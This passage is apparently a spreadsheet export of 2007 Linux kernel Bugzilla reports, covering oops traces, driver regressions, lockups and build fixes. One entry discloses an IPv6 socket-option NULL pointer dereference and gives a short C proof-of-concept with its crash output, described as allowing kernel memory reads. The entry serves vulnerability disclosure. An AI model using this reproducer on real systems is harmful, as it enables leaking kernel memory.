14:51:57 disher kernel: [&lt;c0140c0e&gt;] pdflush+0x0/0x19d Mar 5 14:51:57 disher kernel: [&lt;c0140d17&gt;] pdflush+0x109/0x19d Mar 5 14:51:57 disher kernel: [&lt;c01408bb&gt;] wb_kupdate+0x0/0xdf Mar 5 14:51:57 disher kernel: [&lt;c012693e&gt;] kthread+0xb2/0xdc Mar 5 14:51:57 disher kernel: [&lt;c012688c&gt;] kthread+0x0/0xdc Mar 5 14:51:57 disher kernel: [&lt;c01031af&gt;] kernel_thread_helper+0x7/0x10 Mar 5 14:51:57 disher kernel: ======================= Mar 5 14:51:57 disher kernel: Code: 70 43 8b 4a 18 8b 6c 24 1c 89 4c 24 24 8b 52 04 39 fa 0f 85 75 ff ff ff 85 ed 0f 85 1f 01 00 00 e9 dd 02 00 00 8b 06 a8 08 75 04 &lt;0f&gt; 0b eb fe 8b 7e 14 b9 0c 00 00 00 2b 4c 24 14 8b 44 24 34 8b Mar 5 14:51:57 disher kernel: EIP: [&lt;c0174733&gt;] __mpage_writepage+0x13a/0x48c SS:ESP 0068:c2273db8</t>
  </si>
  <si>
    <t>possible recursive locking in vfs_unlink</t>
  </si>
  <si>
    <t>2007-03-05 02:57 UTC</t>
  </si>
  <si>
    <t>2007-03-07 14:16 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: - Distribution: gentoo Hardware Environment: Pentium III 00:00.0 Host bridge: VIA Technologies, Inc. VT82C693A/694x [Apollo PRO133x] (rev c4) 00:01.0 PCI bridge: VIA Technologies, Inc. VT82C598/694x [Apollo MVP3/Pro133x AGP] 00:04.0 ISA bridge: VIA Technologies, Inc. VT82C686 [Apollo Super South] (rev 22) 00:04.1 IDE interface: VIA Technologies, Inc. VT82C586A/B/VT82C686/A/B/VT823x/A/C PIPC Bus Master IDE (rev 10) 00:04.2 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 10) 00:04.3 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 10) 00:04.4 Host bridge: VIA Technologies, Inc. VT82C686 [Apollo Super ACPI] (rev 30) 00:05.0 Multimedia audio controller: Ensoniq ES1371 [AudioPCI-97] (rev 07) 00:09.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10) 01:00.0 VGA compatible controller: nVidia Corporation NV11 [GeForce2 MX/MX 400] (rev a1) Software Environment: Linux queen 2.6.20 #2 PREEMPT Mon Mar 5 01:06:30 CET 2007 i686 Pentium III (Coppermine) GenuineIntel GNU/Linux ltp 20070228, ext3 partition Problem Description: [ 3985.659543] ============================================= [ 3985.659686] [ INFO: possible recursive locking detected ] [ 3985.659744] 2.6.20 #2 [ 3985.659797] --------------------------------------------- [ 3985.659922] 4-1.test/14354 is trying to acquire lock: [ 3985.659980] (&amp;inode-&gt;i_mutex){--..}, at: [&lt;c05db79c&gt;] mutex_lock+0x1c/0x20 [ 3985.660182] [ 3985.660184] but task is already holding lock: [ 3985.660340] (&amp;inode-&gt;i_mutex){--..}, at: [&lt;c05db79c&gt;] mutex_lock+0x1c/0x20 [ 3985.660525] [ 3985.660527] other info that might help us debug this: [ 3985.660630] 1 lock held by 4-1.test/14354: [ 3985.660743] #0: (&amp;inode-&gt;i_mutex){--..}, at: [&lt;c05db79c&gt;] mutex_lock+0x1c/0x20 [ 3985.660969] [ 3985.660971] stack backtrace: [ 3985.661128] [&lt;c01038ea&gt;] show_trace_log_lvl+0x1a/0x30 [ 3985.661217] [&lt;c0104092&gt;] show_trace+0x12/0x20 [ 3985.661353] [&lt;c0104186&gt;] dump_stack+0x16/0x20 [ 3985.661432] [&lt;c013369f&gt;] __lock_acquire+0xb1f/0xe00 [ 3985.661584] [&lt;c01339f0&gt;] lock_acquire+0x70/0x90 [ 3985.661664] [&lt;c05db51b&gt;] __mutex_lock_slowpath+0x6b/0x2d0 [ 3985.661803] [&lt;c05db79c&gt;] mutex_lock+0x1c/0x20 [ 3985.661881] [&lt;c01680c8&gt;] vfs_unlink+0x58/0xb0 [ 3985.662031] [&lt;c03afe58&gt;] sys_mq_unlink+0x78/0xe0 [ 3985.662122] [&lt;c0103200&gt;] syscall_call+0x7/0xb [ 3985.662257] ======================= Steps to reproduce: running ltp 20070228</t>
  </si>
  <si>
    <t>r8169: "link up" is not detected if ethernet cable isn't connected during boot</t>
  </si>
  <si>
    <t>2007-03-05 10:13 UTC</t>
  </si>
  <si>
    <t>Roman Jarosz</t>
  </si>
  <si>
    <t>2007-03-11 12:57 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.19.3 Distribution: Gentoo ~86 Hardware Environment: RTL8111/8168B PCI-E Gigabit Ethernet on ASUS A6Jc laptop Software Environment: sys-devel/gcc-4.1.2 sys-fs/udev-105 sys-apps/ifplugd-0.28-r7 Problem Description: If ethernet cable is not connected during boot than later when I connect network cable "link up" is not detected. As a result of this I can't setup network. If cable is connected during boot "link up" is detected even if I remove it and plug it back. I found out that this regression was introduced with this commit http://git.kernel.org/?p=linux/kernel/git/torvalds/linux- 2.6.git;a=commitdiff;h=bf793295e1090af84972750898bf8470df5e5419 r8169: perform a PHY reset before any other operation at boot time Francois Romieu [Tue, 31 Oct 2006 23:53:05 +0000 (00:53 +0100)] Realtek's 8139/810x (0x8136) PCI-E comes with a touchy PHY. A big heavy reset seems to calm it down. Fix for http://bugzilla.kernel.org/show_bug.cgi?id=7378. And probably with change in rtl8169_xmii_reset_enable, because if I revert this change "link up" is detected correctly. Maybe it's typing error because we use mdio_read to read something and than we don't use it. Here is rtl8169_xmii_reset_enable diff @@ -571,8 +571,8 @@ static void rtl8169_xmii_reset_enable(void __iomem *ioaddr) { unsigned int val; - val = (mdio_read(ioaddr, MII_BMCR) | BMCR_RESET) &amp; 0xffff; - mdio_write(ioaddr, MII_BMCR, val); + mdio_write(ioaddr, MII_BMCR, BMCR_RESET); + val = mdio_read(ioaddr, MII_BMCR); } with old val = (mdio_read(ioaddr, MII_BMCR) | BMCR_RESET) &amp; 0xffff; mdio_write(ioaddr, MII_BMCR, val); it works. Steps to reproduce: 1. Remove network cable 2. Boot 3. Connect cable 4. "Link up" isn't detected</t>
  </si>
  <si>
    <t>pptp server lockup in ppp_asynctty_receive()</t>
  </si>
  <si>
    <t>2007-03-05 14:26 UTC</t>
  </si>
  <si>
    <t>Yuriy Shkandybin</t>
  </si>
  <si>
    <t>2008-09-23 09:44 UTC</t>
  </si>
  <si>
    <t>Already several kernel releases i've expirienced different lockups of vpn (pptp) server. There is more then 200 ppp connections sometimes. With kernel debug i was able to retrive next information: First: Showing all locks held in the system: 1 lock held by agetty/4486: #0: (&amp;tty-&gt;atomic_read_lock){--..}, at: [&lt;c01d4e6f&gt;] read_chan+0x41a/0x60b 1 lock held by agetty/4487: #0: (&amp;tty-&gt;atomic_read_lock){--..}, at: [&lt;c01d4e6f&gt;] read_chan+0x41a/0x60b 1 lock held by agetty/4488: #0: (&amp;tty-&gt;atomic_read_lock){--..}, at: [&lt;c01d4e6f&gt;] read_chan+0x41a/0x60b 2 locks held by pptpctrl/4500: #0: (&amp;tty-&gt;atomic_write_lock){--..}, at: [&lt;c01d0f8f&gt;] tty_write+0x83/0x1d0 #1: (&amp;ap-&gt;recv_lock){....}, at: [&lt;c02241fe&gt;] ppp_asynctty_receive+0x2e/0x710 ============================================= BUG: spinlock lockup on CPU#1, pppd/4504, df5048c4 [&lt;c01c42c6&gt;] _raw_spin_lock+0x100/0x134 [&lt;c0223f03&gt;] ppp_async_ioctl+0xa7/0x1d0 [&lt;c0221b7c&gt;] ppp_ioctl+0xa5/0xbff [&lt;c012f2a5&gt;] down_read+0x29/0x3a [&lt;c0223e5c&gt;] ppp_async_ioctl+0x0/0x1d0 [&lt;c0221ba5&gt;] ppp_ioctl+0xce/0xbff [&lt;c029b78f&gt;] _spin_unlock+0x14/0x1c [&lt;c014a22a&gt;] do_wp_page+0x256/0x4ba [&lt;c014c1e9&gt;] __handle_mm_fault+0x74e/0xa22 [&lt;c0167224&gt;] do_ioctl+0x64/0x6d [&lt;c016727d&gt;] vfs_ioctl+0x50/0x273 [&lt;c01674d4&gt;] sys_ioctl+0x34/0x50 [&lt;c0102dae&gt;] sysenter_past_esp+0x5f/0x99 ======================= BUG: soft lockup detected on CPU#0! [&lt;c013ce27&gt;] softlockup_tick+0x8d/0xbc [&lt;c0123784&gt;] update_process_times+0x28/0x5e [&lt;c010d9c4&gt;] smp_apic_timer_interrupt+0x80/0x9c [&lt;c0103903&gt;] apic_timer_interrupt+0x33/0x38 [&lt;c01c2e9d&gt;] delay_tsc+0x9/0x13 [&lt;c01c2ed3&gt;] __delay+0x6/0x7 [&lt;c01c426f&gt;] _raw_spin_lock+0xa9/0x134 [&lt;c01d0f8f&gt;] tty_write+0x83/0x1d0 [&lt;c01cf418&gt;] tty_ldisc_try+0x2f/0x33 [&lt;c029bc8c&gt;] lock_kernel+0x19/0x24 [&lt;c01d1017&gt;] tty_write+0x10b/0x1d0 [&lt;c01d35cf&gt;] write_chan+0x0/0x320 [&lt;c015d502&gt;] vfs_write+0x87/0xf0 [&lt;c01d0f0c&gt;] tty_write+0x0/0x1d0 [&lt;c015daa9&gt;] sys_write+0x41/0x6a [&lt;c0102dae&gt;] sysenter_past_esp+0x5f/0x99 ======================= Second) &lt;0&gt;BUG: spinlock lockup on CPU#0, pppd/5209, de3e2884 [&lt;c01c42c6&gt;] _raw_spin_lock+0x100/0x134 BUG: spinlock lockup on CPU#1, ip-down/7524, c0353300 [&lt;c01c42c6&gt;] _raw_spin_lock+0x100/0x134 [&lt;c029bc8c&gt;] lock_kernel+0x19/0x24 [&lt;c015f234&gt;] chrdev_open+0x8a/0x16e [&lt;c015f1aa&gt;] chrdev_open+0x0/0x16e [&lt;c015ba94&gt;] __dentry_open+0xaf/0x1a0 [&lt;c015bc12&gt;] nameidata_to_filp+0x31/0x3a [&lt;c015bc54&gt;] do_filp_open+0x39/0x40 [&lt;c029b78f&gt;] _spin_unlock+0x14/0x1c [&lt;c015b9d4&gt;] get_unused_fd+0xaa/0xbb [&lt;c015bc95&gt;] do_sys_open+0x3a/0x6d [&lt;c015bd03&gt;] sys_open+0x1c/0x20 [&lt;c0102dae&gt;] sysenter_past_esp+0x5f/0x99 ======================= [&lt;c0223f03&gt;] ppp_async_ioctl+0xa7/0x1d0 [&lt;c0221b7c&gt;] ppp_ioctl+0xa5/0xbff [&lt;c012f2a5&gt;] down_read+0x29/0x3a [&lt;c0223e5c&gt;] ppp_async_ioctl+0x0/0x1d0 [&lt;c0221ba5&gt;] ppp_ioctl+0xce/0xbff [&lt;c029b78f&gt;] _spin_unlock+0x14/0x1c [&lt;c014a22a&gt;] do_wp_page+0x256/0x4ba [&lt;c014c1e9&gt;] __handle_mm_fault+0x74e/0xa22 [&lt;c0167224&gt;] do_ioctl+0x64/0x6d [&lt;c016727d&gt;] vfs_ioctl+0x50/0x273 [&lt;c01674d4&gt;] sys_ioctl+0x34/0x50 [&lt;c0102dae&gt;] sysenter_past_esp+0x5f/0x99 ======================= Third) BUG: soft lockup detected on CPU#0! [&lt;c013ce27&gt;] softlockup_tick+0x8d/0xbc [&lt;c0123784&gt;] update_process_times+0x28/0x5e [&lt;c010d9c4&gt;] smp_apic_timer_interrupt+0x80/0x9c [&lt;c0103903&gt;] apic_timer_interrupt+0x33/0x38 [&lt;c01c2e9d&gt;] delay_tsc+0x9/0x13 [&lt;c01c2ed3&gt;] __delay+0x6/0x7 [&lt;c01c426f&gt;] _raw_spin_lock+0xa9/0x134 [&lt;c01cf418&gt;] tty_ldisc_try+0x2f/0x33 [&lt;c029bc8c&gt;] lock_kernel+0x19/0x24 [&lt;c01d1984&gt;] tty_read+0x5a/0xbe [&lt;c015d5f0&gt;] vfs_read+0x85/0xee [&lt;c01d192a&gt;] tty_read+0x0/0xbe [&lt;c015da3f&gt;] sys_read+0x41/0x6a [&lt;c0102dae&gt;] sysenter_past_esp+0x5f/0x99 ======================= BUG: soft lockup detected on CPU#0! [&lt;c013ce27&gt;] softlockup_tick+0x8d/0xbc [&lt;c0123784&gt;] update_process_times+0x28/0x5e [&lt;c010d9c4&gt;] smp_apic_timer_interrupt+0x80/0x9c [&lt;c0103903&gt;] apic_timer_interrupt+0x33/0x38 [&lt;c01c00d8&gt;] prio_tree_insert+0xe8/0x23b [&lt;c01c4275&gt;] _raw_spin_lock+0xaf/0x134 [&lt;c01cf418&gt;] tty_ldisc_try+0x2f/0x33 [&lt;c029bc8c&gt;] lock_kernel+0x19/0x24 [&lt;c01d1984&gt;] tty_read+0x5a/0xbe [&lt;c015d5f0&gt;] vfs_read+0x85/0xee [&lt;c01d192a&gt;] tty_read+0x0/0xbe [&lt;c015da3f&gt;] sys_read+0x41/0x6a [&lt;c0102dae&gt;] sysenter_past_esp+0x5f/0x99 Next via SysRq: Showing all locks held in the system: 1 lock held by agetty/5057: #0: (&amp;tty-&gt;atomic_read_lock){--..}, at: [&lt;c01d4e6f&gt;] read_chan+0x41a/0x60b 1 lock held by agetty/5058: #0: (&amp;tty-&gt;atomic_read_lock){--..}, at: [&lt;c01d4e6f&gt;] read_chan+0x41a/0x60b 1 lock held by agetty/5059: #0: (&amp;tty-&gt;atomic_read_lock){--..}, at: [&lt;c01d4e6f&gt;] read_chan+0x41a/0x60b 2 locks held by pptpctrl/5071: #0: (&amp;tty-&gt;atomic_write_lock){--..}, at: [&lt;c01d0f8f&gt;] tty_write+0x83/0x1d0 #1: (&amp;ap-&gt;recv_lock){....}, at: [&lt;c02241fe&gt;] ppp_asynctty_receive+0x2e/0x710 ~#SysRq : Show Blocked State free sibling task PC stack pid father child younger older pptpctrl D C02A18E0 0 5071 4646 5074 5094 5064 (L-TLB) df3a3bd0 00000082 0029b837 c02a18e0 00000246 00000000 dd4f131c dd563cac def86030 c140864c 00000000 00000000 00000009 def86030 2ccaa8e5 0000017d 3b9aca00 def8613c c1407cc0 00000000 006a9953 00000000 de8f503c 00000046 Call Trace: [&lt;c029b5b0&gt;] __down+0x8c/0xf4 [&lt;c0116209&gt;] default_wake_function+0x0/0xc [&lt;c029b397&gt;] __down_failed+0x7/0xc [&lt;c0223de4&gt;] ppp_asynctty_close+0x28/0x98 [&lt;c0223e4f&gt;] ppp_asynctty_close+0x93/0x98 [&lt;c0223e59&gt;] ppp_asynctty_hangup+0x5/0x8 [&lt;c01d0c8a&gt;] do_tty_hangup+0x119/0x391 [&lt;c01d0612&gt;] release_dev+0x154/0x69b [&lt;c0158a01&gt;] poison_obj+0x20/0x3d [&lt;c0158a01&gt;] poison_obj+0x20/0x3d [&lt;c0158c70&gt;] cache_free_debugcheck+0xc7/0x1dd [&lt;c016ddd5&gt;] destroy_inode+0x20/0x33 [&lt;c016c88c&gt;] dput+0xd9/0x145 [&lt;c01d0b68&gt;] tty_release+0xf/0x18 [&lt;c015dd96&gt;] __fput+0x3c/0xe7 [&lt;c015b906&gt;] filp_close+0x3e/0x62 [&lt;c011c73b&gt;] put_files_struct+0xa5/0xb8 [&lt;c011d808&gt;] do_exit+0x124/0x7e2 [&lt;c01e1710&gt;] vgacon_set_cursor_size+0x2d/0xeb [&lt;c0104392&gt;] do_trap+0x0/0xa9 [&lt;c0104bf5&gt;] do_invalid_op+0x0/0xab [&lt;c0104c97&gt;] do_invalid_op+0xa2/0xab [&lt;c024d1e4&gt;] skb_under_panic+0x59/0x5d [&lt;c0113ecc&gt;] __wake_up+0x32/0x43 [&lt;c011af94&gt;] release_console_sem+0x22d/0x239 [&lt;c011b4f1&gt;] vprintk+0x1fb/0x37c [&lt;c029bd4c&gt;] error_code+0x7c/0x84 [&lt;c024d1e4&gt;] skb_under_panic+0x59/0x5d [&lt;c02248a2&gt;] ppp_asynctty_receive+0x6d2/0x710 [&lt;c02248b0&gt;] ppp_asynctty_receive+0x6e0/0x710 [&lt;c01d5a09&gt;] pty_write+0x39/0x41 [&lt;c01d37e1&gt;] write_chan+0x212/0x320 [&lt;c0116209&gt;] default_wake_function+0x0/0xc [&lt;c01d1028&gt;] tty_write+0x11c/0x1d0 [&lt;c01d35cf&gt;] write_chan+0x0/0x320 [&lt;c015d502&gt;] vfs_write+0x87/0xf0 [&lt;c01d0f0c&gt;] tty_write+0x0/0x1d0 [&lt;c015daa9&gt;] sys_write+0x41/0x6a [&lt;c0102dae&gt;] sysenter_past_esp+0x5f/0x99 ======================= Dump registers Pid: 13874, comm: pptpctrl EIP: 0060:[&lt;c01c2e94&gt;] CPU: 0 EIP is at delay_tsc+0x0/0x13 EFLAGS: 00000246 Not tainted (2.6.20-gentoo #10) EAX: 00000001 EBX: c0353300 ECX: f52a298e EDX: c799bc55 ESI: 492d5b81 EDI: 00000000 EBP: 8eb4e7d4 DS: 007b ES: 007b GS: 00d8 CR0: 8005003b CR2: b7e598b8 CR3: 0e6f3000 CR4: 000006d0 [&lt;c01c2ed3&gt;] __delay+0x6/0x7 [&lt;c01c426f&gt;] _raw_spin_lock+0xa9/0x134 [&lt;c01cf418&gt;] tty_ldisc_try+0x2f/0x33 [&lt;c029bc8c&gt;] lock_kernel+0x19/0x24 [&lt;c01d1984&gt;] tty_read+0x5a/0xbe [&lt;c015d5f0&gt;] vfs_read+0x85/0xee [&lt;c01d192a&gt;] tty_read+0x0/0xbe [&lt;c015da3f&gt;] sys_read+0x41/0x6a [&lt;c0102dae&gt;] sysenter_past_esp+0x5f/0x99 ======================= Information about system: sh scripts/ver_linux If some fields are empty or look unusual you may have an old version. Compare to the current minimal requirements in Documentation/Changes. Linux vpn2 2.6.20-gentoo #10 SMP Mon Mar 5 11:07:33 MSK 2007 i686 Intel(R) Pentium(R) 4 CPU 2.40GHz GenuineIntel GNU/Linux Gnu C 4.1.2 Gnu make 3.81 binutils 2.17 util-linux 2.12r mount 2.12r module-init-tools 3.2.2 e2fsprogs 1.39 reiserfsprogs 3.6.19 PPP 2.4.4 Linux C Library &gt; libc.2.5 Dynamic linker (ldd) 2.5 Procps 3.2.7 Net-tools 1.60 Kbd 1.12 Sh-utils 6.7 udev 104 Modules Loaded 8021q ipt_TCPMSS xt_tcpudp xt_pkttype iptable_filter ip_tables x_tables i2c_i801 i2c_core</t>
  </si>
  <si>
    <t>Plamen Petrov</t>
  </si>
  <si>
    <t>ArbitrarayKernel memory leak</t>
  </si>
  <si>
    <t>2.6.17-11 (Ubuntu kernel)</t>
  </si>
  <si>
    <t>2007-03-06 03:07 UTC</t>
  </si>
  <si>
    <t>Anonymous</t>
  </si>
  <si>
    <t>2007-04-05 23:11 UTC</t>
  </si>
  <si>
    <t>There is a NULL pointer dereference which can lead to an arbitray kernel memory leak, in the file net/ipv6/ipv6_sockglue.c : 340 case IPV6_2292PKTOPTIONS: 341 { 342 struct ipv6_txoptions *opt = NULL; [1] 343 struct msghdr msg; 344 struct flowi fl; 345 int junk; 346 347 fl.fl6_flowlabel = 0; 348 fl.oif = sk-&gt;sk_bound_dev_if; 349 340 if (optlen == 0) 341 goto update; [2] 377 update: 378 retv = 0; 379 if (inet_sk(sk)-&gt;is_icsk) { 380 if (opt) { ... 389 } 390 opt = xchg(&amp;np-&gt;opt, opt); [3] 391 sk_dst_reset(sk); 392 } else { 393 write_lock(&amp;sk-&gt;sk_dst_lock); 394 opt = xchg(&amp;np-&gt;opt, opt); [4] 395 write_unlock(&amp;sk-&gt;sk_dst_lock); 396 sk_dst_reset(sk); 397 } 819 case IPV6_DSTOPTS: 820 { 821 822 lock_sock(sk); 823 len = ipv6_getsockopt_sticky(sk, np-&gt;opt-&gt;hopopt, [5] 824 optval, len); 825 release_sock(sk); 826 return put_user(len, optlen); 827 } In the function do_ipv6_setsockopt(), if optname = IPV6_2292PKTOPTIONS and optlen = 0 [2], np-&gt;opt is set to NULL [3][4]. In the function do_ipv6_getsockopt(), if optname = IPV6_DSTOPTS, np-&gt;opt is dereferenced [5]. An attacker can read any portion of the kernel memory : ipv6_getsockopt_sticky() copies np-&gt;opt-&gt;hopopt to optavl which is an user buffer, and np-&gt;opt can be mmaped to NULL. Here is a program that reproduces the bug : #include &lt;netinet/in.h&gt; int main(int argc, char *argv[]) { int s; unsigned int optlen = 4; s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP); setsockopt(s, IPPROTO_IPV6, 6, (void *)NULL, 0); getsockopt(s, IPPROTO_IPV6, 59, (void *)NULL, &amp;optlen); return 0; } And the Oops output : [17183522.904000] BUG: unable to handle kernel NULL pointer dereference at virtual address 00000008 [17183522.904000] printing eip: [17183522.904000] f8eba4d4 [17183522.904000] *pde = 00000000 [17183522.904000] Oops: 0000 [#1] [17183522.904000] Modules linked in: nls_utf8 nls_cp437 vfat fat sg sd_mod usb_storage libusual binfmt_misc rfcomm hidp l2cap bluetooth fglrx speedstep_centr ino cpufreq_userspace cpufreq_stats freq_table cpufreq_powersave cpufreq_ondemand cpufreq_conservative video tc1100_wmi sbs sony_acpi pcc_acpi i2c_ec i2c_cor e hotkey dev_acpi button battery container ac asus_acpi dm_mod md_mod sr_mod sbp2 scsi_mod parport_pc lp parport ipv6 8139cp pcmcia 8139too joydev ipw2200 mi i ieee80211 ieee80211_crypt yenta_socket rsrc_nonstatic sdhci mmc_core tifm_7xx1 tifm_core tsdev pcmcia_core snd_intel8x0 snd_ac97_codec snd_ac97_bus snd_pcm _oss snd_mixer_oss snd_pcm snd_timer snd evdev intel_agp agpgart usbhid rtc soundcore snd_page_alloc shpchp pci_hotplug psmouse serio_raw ext3 jbd ohci1394 i eee1394 ehci_hcd uhci_hcd usbcore ide_generic ide_cd cdrom ide_disk piix generic thermal processor fan capability commoncap vesafb fbcon tileblit font bitbli t softcursor [17183522.904000] CPU: 0 [17183522.904000] EIP: 0060:[&lt;f8eba4d4&gt;] Tainted: P VLI [17183522.904000] EFLAGS: 00210286 (2.6.17-11-386 #2) [17183522.904000] EIP is at ipv6_getsockopt+0x4e4/0x6d0 [ipv6] [17183522.904000] eax: 00000000 ebx: d33d1b00 ecx: d33d1f18 edx: d33d1f18 [17183522.904000] esi: 00000000 edi: 00000029 ebp: 0000003b esp: dcd07d5c [17183522.904000] ds: 007b es: 007b ss: 0068 [17183522.904000] Process poc (pid: 5968, threadinfo=dcd06000 task=dbbb5540) [17183522.904000] Stack: 00000001 00000003 dfa794d8 00200286 d33d1f18 d2b8b3ec 00000004 00000006 [17183522.904000] c025a68b 00200296 00000000 e15f2440 d2b8b3ec 00200282 d33d1b00 00000000 [17183522.904000] d33d1b00 00000000 f8eba94b 00000000 00000000 dfed6000 f8c9a4ff 00000000 [17183522.904000] Call Trace: [17183522.904000] &lt;c025a68b&gt; lock_sock+0xab/0xc0 &lt;f8eba94b&gt; ipv6_setsockopt+0x16b/0xc40 [ipv6] [17183522.904000] &lt;f8c92614&gt; __ext3_journal_stop+0x24/0x50 [ext3] &lt;c0179c74&gt; __mark_inode_dirty+0x34/0x170 [17183522.904000] &lt;c013c78b&gt; do_generic_mapping_read+0x42b/0x540 &lt;c0154f74&gt; cache_alloc_refill+0x314/0x4d0 [17183522.904000] &lt;c0288da6&gt; tcp_getsockopt+0x36/0x2b0 &lt;c016f0b7&gt; d_alloc+0x27/0x190 [17183522.904000] &lt;c016f059&gt; d_instantiate+0x49/0x80 &lt;f8eba7e0&gt; ipv6_setsockopt+0x0/0xc40 [ipv6] [17183522.904000] &lt;c0289966&gt; tcp_setsockopt+0x36/0x370 &lt;c0259de3&gt; sock_common_getsockopt+0x23/0x30 [17183522.904000] &lt;c025872e&gt; sys_getsockopt+0x8e/0xc0 &lt;c0259a44&gt; sys_socketcall+0x234/0x280 [17183522.904000] &lt;c02c7a00&gt; do_page_fault+0x0/0x6e0 &lt;c0102dbb&gt; sysenter_past_esp+0x54/0x79 [17183522.904000] Code: ff 8b 4c 24 10 0f b6 41 45 c0 e8 02 83 e0 01 89 84 24 54 01 00 00 e9 ee fb ff ff 89 d8 31 f6 e8 13 01 3a c7 8b 54 24 10 8b 42 58 &lt;8b&gt; 50 08 85 d2 74 2c 0f b6 42 01 be f2 ff ff ff 8d 3c c5 08 00 [17183522.904000] EIP: [&lt;f8eba4d4&gt;] ipv6_getsockopt+0x4e4/0x6d0 [ipv6] SS:ESP 0068:dcd07d5c</t>
  </si>
  <si>
    <t>2.6.21-rc2-mm2 won't boot</t>
  </si>
  <si>
    <t>2.6.21-rc2-mm2</t>
  </si>
  <si>
    <t>2007-03-06 12:07 UTC</t>
  </si>
  <si>
    <t>2007-03-08 10:51 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.21-rc2-mm1 Distribution: Fedora Devel Hardware Environment: Giga-byte Technology GA-K8N Ultra-9 Mainboard (AMD 64 X2 + Nvidia CK804) Software Environment: N/A Problem Description: kernel won't boot, blank screen &amp; no activity after leaving the bootloader (no messages, no penguins) Steps to reproduce: try to boot</t>
  </si>
  <si>
    <t>r8169 does not detect network speed correctly on newer kernels &gt;= 2.6.19</t>
  </si>
  <si>
    <t>&gt;= 2.6.20</t>
  </si>
  <si>
    <t>2007-03-07 00:21 UTC</t>
  </si>
  <si>
    <t>Eero Volotinen</t>
  </si>
  <si>
    <t>2007-03-07 04:35 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.19 Distribution: Gentoo Hardware Environment: Amilo Pro V2085 machine with r8169 gigabit ethernet card integrated Software Environment: Problem Description: After 2.6.19 kernel, this card cannot detect correct line speed, so ethernetcard works only 10mbps, not 100 and 1000 as it should work. This works on 2.6.19 fine. so there must me something that changed that broke the driver. Steps to reproduce: Compile 2.6.20 or newer and try to plug network line, line is detected as 10 and yellow light is on, in same environment in 2.6.19 it works as it should and green lights goes on.</t>
  </si>
  <si>
    <t>pata_via does not detect SATA cables</t>
  </si>
  <si>
    <t>2007-03-07 09:47 UTC</t>
  </si>
  <si>
    <t>2008-01-29 08:48 UTC</t>
  </si>
  <si>
    <t>Distribution: Ubuntu Feisty Fawn Hardware Environment: VIA EPIA EX15000G mainboard with CX700M2 chipset, IDE bridge has PCI-ID 1106:5324 Problem Description: When booting, the driver detects a 40pin cable and limits the speed to UDMA/33 (limited to UDMA/33 due to 40-wire cable), BUT in fact it is neither a 40 or 80 pin cable. It is an SATA-cable. Therefore it should not be limited to UDMA/33. /dev/sd[ab] are SATA devices, while /dev/hd[cd] are PATA. Both are handled by pata_via. This is what dmesg says: pata_via 0000:00:0f.0: version 0.2.1 ata1: PATA max UDMA/133 cmd 0x000101f0 ctl 0x000103f6 bmdma 0x0001fc00 irq 14 ata2: PATA max UDMA/133 cmd 0x00010170 ctl 0x00010376 bmdma 0x0001fc08 irq 15 scsi0 : pata_via ata1.00: ATA-7: SAMSUNG HM160JI, AD100-10, max UDMA/100 ata1.00: 312581808 sectors, multi 16: LBA48 NCQ (depth 0/32) ata1.00: limited to UDMA/33 due to 40-wire cable ata1.00: configured for UDMA/33 scsi1 : pata_via Switched to high resolution mode on CPU 0 ata2.00: ATAPI, max UDMA/33 ata2.00: configured for UDMA/33 scsi 0:0:0:0: Direct-Access ATA SAMSUNG HM160JI AD10 PQ: 0 ANSI: 5 SCSI device sda: 312581808 512-byte hdwr sectors (160042 MB) sda: Write Protect is off sda: Mode Sense: 00 3a 00 00 SCSI device sda: write cache: enabled, read cache: enabled, doesn't support DPO or FUA SCSI device sda: 312581808 512-byte hdwr sectors (160042 MB) sda: Write Protect is off sda: Mode Sense: 00 3a 00 00 SCSI device sda: write cache: enabled, read cache: enabled, doesn't support DPO or FUA sda: sda1 sda2 sda3 sda4 sd 0:0:0:0: Attached scsi disk sda scsi 1:0:0:0: CD-ROM Slimtype DVDRW SLW-831S WS01 PQ: 0 ANSI: 5 sr0: scsi3-mmc drive: 24x/24x writer cd/rw xa/form2 cdda tray Uniform CD-ROM driver Revision: 3.20 sr 1:0:0:0: Attached scsi CD-ROM sr0 Tell me if you need more information.</t>
  </si>
  <si>
    <t>A bug or a bad comment?  scc_net_rx is not called from scc_rxint</t>
  </si>
  <si>
    <t>2007-03-07 20:13 UTC</t>
  </si>
  <si>
    <t>2007-11-02 12:09 UTC</t>
  </si>
  <si>
    <t>1613 /* ----&gt; receive frame, called from scc_rxint() &lt;---- */ 1614 1615 static void scc_net_rx(struct scc_channel *scc, struct sk_buff *skb) But it is not called from scc_rxint(). the violating call chains are : 1. t_txdelay -&gt; scc_txint -&gt; scc_tx_done -&gt; scc_notify 2. scc_isr -&gt; scc_isr_dispatch -&gt; scc_txint -&gt; scc_tx_done -&gt; scc_notify A bug or a wrong comment?</t>
  </si>
  <si>
    <t>EP93XX_ETH depends on MMI</t>
  </si>
  <si>
    <t>2.6.20.2</t>
  </si>
  <si>
    <t>2007-03-08 06:49 UTC</t>
  </si>
  <si>
    <t>John Donoghue</t>
  </si>
  <si>
    <t>2007-07-29 05:12 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution: stock linux kernel Hardware Environment: Olimex CS-9302 board Software Environment: linux Problem Description: On compiling the kernel with EP93XX_ETH enabled, compilation fails with a number of unresolved mii_* symbols. Looking drivers/net/arm/Kconfig, for the EP93XX_ETH, it does not list MII as a dependancy. Adding "select MII" to the EP93XX_ETH section fixes the problem. Steps to reproduce: configure kernel for ARM EP9302 with ep93xx ethernet and compile.</t>
  </si>
  <si>
    <t>GNUtoo</t>
  </si>
  <si>
    <t>NULL pointer dereference in do_ipv6_setsockopt</t>
  </si>
  <si>
    <t>2007-03-08 16:02 UTC</t>
  </si>
  <si>
    <t>Gabriel Campana</t>
  </si>
  <si>
    <t>2007-03-12 00:44 UTC</t>
  </si>
  <si>
